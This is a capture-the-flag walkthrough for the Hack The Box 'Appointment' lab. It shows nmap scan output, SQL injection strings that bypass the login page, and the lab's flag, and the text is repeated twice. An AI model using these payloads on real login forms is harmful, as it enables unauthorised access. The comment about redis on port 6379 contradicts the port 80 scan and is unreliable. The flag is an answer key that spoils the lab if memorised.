01.APPOINTMENT (SQL INJECTION)

Last updated 2 months ago

VULNERABILITY SCANNING

root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 80
 PORT   STATE SERVICE VERSION
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Login

 * the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
   
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 80
 PORT   STATE SERVICE
 80/tcp open  http
 | http-internal-ip-disclosure: 
 |_  Internal IP Leaked: 127.0.0.1
 |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
 | http-fileupload-exploiter: 
 |   
 |_    Couldn't find a file-type field.
 |_http-csrf: Couldn't find any CSRF vulnerabilities.
 | http-enum: 
 |   /css/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
 |   /images/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
 |   /js/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
 |_  /vendor/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
 |_http-dombased-xss: Couldn't find any DOM based XSS.

 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 6379
    - e.g., weak configurations, or known vulnerabilities in the redis service
       - if no results are found then the service may be fully patched!

FOOTHOLD

Submit root flag

#determine how the webapp would react to malicious user input
root@htb:~$ BROWSER > {targetSite:port}
 username field: admin'#
  * ALT: admin' OR 1 = '1 --
         admin' OR 1 = '1;--
 password field: {arbitraryPassword}
  * Congratulations! Your flag is: e3d0796d002a446c0e622226f42e9672

VULNERABILITY SCANNING

root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 80
 PORT   STATE SERVICE VERSION
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Login

 * the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
   
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 80
 PORT   STATE SERVICE
 80/tcp open  http
 | http-internal-ip-disclosure: 
 |_  Internal IP Leaked: 127.0.0.1
 |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
 | http-fileupload-exploiter: 
 |   
 |_    Couldn't find a file-type field.
 |_http-csrf: Couldn't find any CSRF vulnerabilities.
 | http-enum: 
 |   /css/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
 |   /images/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
 |   /js/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
 |_  /vendor/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
 |_http-dombased-xss: Couldn't find any DOM based XSS.

 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 6379
    - e.g., weak configurations, or known vulnerabilities in the redis service
       - if no results are found then the service may be fully patched!

FOOTHOLD

Submit root flag

#determine how the webapp would react to malicious user input
root@htb:~$ BROWSER > {targetSite:port}
 username field: admin'#
  * ALT: admin' OR 1 = '1 --
         admin' OR 1 = '1;--
 password field: {arbitraryPassword}
  * Congratulations! Your flag is: e3d0796d002a446c0e622226f42e9672

01.APPOINTMENT (SQL INJECTION)

01.APPOINTMENT (SQL INJECTION)

ENUMERATE SERVICES

VULNERABILITY SCANNING

FOOTHOLD

ENUMERATE SERVICES

VULNERABILITY SCANNING

FOOTHOLD